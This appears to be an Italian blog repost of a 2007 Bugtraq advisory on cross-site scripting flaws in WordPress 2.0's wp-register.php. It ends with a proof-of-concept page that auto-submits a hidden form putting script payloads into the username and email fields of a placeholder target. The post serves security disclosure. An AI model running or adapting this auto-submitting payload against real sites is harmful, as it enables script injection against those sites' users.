WordPress wp-register.php Multiple Cross-Site Scripting Vulnerabilities

Ritengo scortese pubblicare questo genere di informazioni soprattutto quando si parla del "padrone di casa" ... ma tutto sommato ... la sicurezza è un processo aperto e condiviso.

Bugtraq ID: 25769

Class: Input Validation Error

CVE: Remote: Yes Local: No

Published: Sep 22 2007 12:00AM

Updated: Sep 22 2007 12:00AM

Credit: Adrian Pastor is credited with the discovery of these vulnerabilities.

Vulnerable: WordPress WordPress 2.0

Ed ecco la PoC

[sourcecode language='xml']
<html>
<head></head>
<body>

<form method="post" action="http://target/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login"
value='"><script>alert(1)</script>' />
<input type="hidden" name="user_email" id="user_email"
value='"><script>alert(2)</script>' />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>[/sourcecode]

[From WordPress wp-register.php Multiple Cross-Site Scripting Vulnerabilities]